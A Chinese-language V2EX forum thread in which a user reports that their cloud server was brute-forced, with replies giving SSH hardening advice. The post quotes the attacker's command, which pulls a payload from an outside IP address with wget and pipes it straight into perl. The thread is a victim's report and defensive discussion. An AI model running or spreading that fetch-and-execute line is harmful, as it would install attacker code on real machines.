阿里云被人暴力破解了

7 小时 59 分钟前
 webfamer
看了下最近登陆地是法国,那人用这个命令:bash -c echo -e "\033[0m";echo -ne " \033[93m[\033[91m 1491/15819 \033[93m] \033[93m[\033[97m Executing cmd to \033[92m123.56.152.41:22 \033[93m] \033[96m ";wget -qO - 61.14.210.71/.j/sus3|perl

下载了一堆爆破工具包到我服务器上,然后用我服务器跑攻击脚本。现在服务器被阿里云判定为恶意攻击,暂时封禁了
6225 次点击
所在节点    信息安全
40 条回复
webfamer
7 小时 59 分钟前
Yanlongli
7 小时 46 分钟前
太正常了,服务器天天被扫
所以只开 私钥登录
snowfuck
7 小时 40 分钟前
没有类似 cloudflare tunnel 的东西吗?我一般都不暴露 ssh 端口出来。
opengps
7 小时 36 分钟前
有点这样的经历挺好的,不然根本理解不了为什么要做那么对防护操作,也理解不了渗透往往只是几个简单的漏洞组合起来的严重后果
SoulFlame
7 小时 35 分钟前
只是你自己的云服务器。。。我还以为是阿里云。。。
jacketma
7 小时 33 分钟前
@webfamer 楼主 ssh 用的弱密码吗?我的阿里云为了方便也开了远程 ssh 登录,端口也没改,不过是强密码,很多年了,看到一直有攻击,一直都没事😄
y1y1
6 小时 42 分钟前
这标题起的
icanfork
6 小时 36 分钟前
这标题,云服务器第一件事就是
1. 禁止 root 登录
2. 禁止密码登录,使用 ssh 密钥登录
3. 修改默认 ssh 端口 22 到其他
lululau
6 小时 18 分钟前
你咋不说银河系被人暴力破解了
w2GvCF
6 小时 11 分钟前
可以加强 ECS 安全组规则防护,限制远程连接服务器的 IP 地址,只允许自己的 IP 连接。
定期修改服务器密码,设置复杂的密码,建议设置用 ssh 密钥方式远程连接服务器。
这样基本就可以防护暴力破解了
Cu635
6 小时 8 分钟前
最关键的,别人是怎么登录上去的没说,是 ssh 弱密码?
june4
6 小时 1 分钟前
ssh 的 root 默认应该是个挺长的随机密码吧,几乎不太可能是这个原因,除非你为了自己方便改了弱密码。
ThisDay
6 小时 0 分钟前
不要总想搞个大新闻
ingram22mb30
5 小时 49 分钟前
123.56.152.41 ( C 段画像)‘恶意 IP 暴力破解’,整个/24 里一个 IP 是恶意 IP 。
killva4624
5 小时 40 分钟前
你在 UC 上的班?
menyuguren
5 小时 31 分钟前
安装了哪吒面板?
layxy
5 小时 29 分钟前
我的 ssh 只开 ip 白名单访问,ip 平时不咋变,如果 ip 容易变嫌麻烦就使用密钥登录吧
5waker
5 小时 28 分钟前
ssh 换端口就能避免很多问题了,如果 ip 固定也可以考虑 ip 白名单
jackerbauer
5 小时 27 分钟前
标题党
opeth
5 小时 23 分钟前
你这题目起的,我以为是阿里的服务器被攻击了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1227150

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX